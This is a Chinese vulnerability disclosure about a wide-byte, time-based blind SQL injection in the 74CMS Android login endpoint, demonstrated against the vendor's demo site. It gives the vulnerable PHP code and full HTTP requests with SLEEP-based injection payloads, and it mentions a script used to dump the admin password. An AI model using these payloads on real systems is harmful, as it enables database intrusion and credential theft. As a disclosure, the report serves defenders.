|骑士CMS某接口1处宽字节SQL盲注之三(官网demo测试)

骑士CMS某接口1处宽字节SQL盲注之三(官网demo测试)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：骑士CMS某接口1处宽字节SQL盲注(官网demo测试) ### 详细说明：手机客户端1处接口存在宽字节SQL注入，无关键字过滤,理论上可以获取任意数据。 ``` http://demo.74cms.com/android/login.php ``` 对应代码： ``` 10 $username=addslashes($username); 11 $password=addslashes($password); 12 $username=iconv("utf-8",QISHI_DBCHARSET,$username); 13 $password=iconv("utf-8",QISHI_DBCHARSET,$password); ``` $username经过iconv转换后直接进入了SQL,导致SQL注入。没有回显，只好时间延迟注入了。 0x01: "username": "%E9%8C%A6"返回数据库错误 ``` POST http://demo.74cms.com/android/login.php HTTP/1.1 Host: demo.74cms.com User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: null Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 73 Cookie: safedog-flow-item=7308413BC1624F4F2DF983295AAE94E8; PHPSESSID=735536f52f85396245830255c85834c4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache req={"androidkey":"123456","username": "%E9%8C%A6", "userpwd": "111111"} ``` [<img src="https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png) 0x02: "username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(1)))jmpX)#": 时间延迟 ``` POST http://demo.74cms.com/android/login.php HTTP/1.1 Host: demo.74cms.com Proxy-Connection: keep-alive Content-Length: 132 Origin: chrome-extension://hgmloofddffdnphfgcellkdfbfbjeloo User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4 Cookie: safedog-flow-item=93D3A8628D75EC8B8C5ABA78A3011359; PHPSESSID=150adfcc32e61bbb17e5d0a5ac9ace18; QS[uid]=742; QS[username]=mytstcompany; QS[password]=22a945a2f53f35b24ed4a11b398dbcf9; QS[utype]=1; QS[pmscount]=1; bdshare_firstime=1429582026109 req={"androidkey":"123456","username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(1)))jmpX)#", "userpwd": "111111"} ``` [<img src="https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png) 0x03: "username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(5)))jmpX)#": 时间延迟 ``` POST http://demo.74cms.com/android/login.php HTTP/1.1 Host: demo.74cms.com Proxy-Connection: keep-alive Content-Length: 132 Origin: chrome-extension://hgmloofddffdnphfgcellkdfbfbjeloo User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4 Cookie: safedog-flow-item=93D3A8628D75EC8B8C5ABA78A3011359; PHPSESSID=150adfcc32e61bbb17e5d0a5ac9ace18; QS[uid]=742; QS[username]=mytstcompany; QS[password]=22a945a2f53f35b24ed4a11b398dbcf9; QS[utype]=1; QS[pmscount]=1; bdshare_firstime=1429582026109 req={"androidkey":"123456","username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(5)))jmpX)#", "userpwd": "111111"} ``` [<img src="https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png) 写个代码取管理员密码： ``` python dbdump.py ``` [<img src="https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png) [<img src="https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png) [<img src="https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png) [<img src="https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™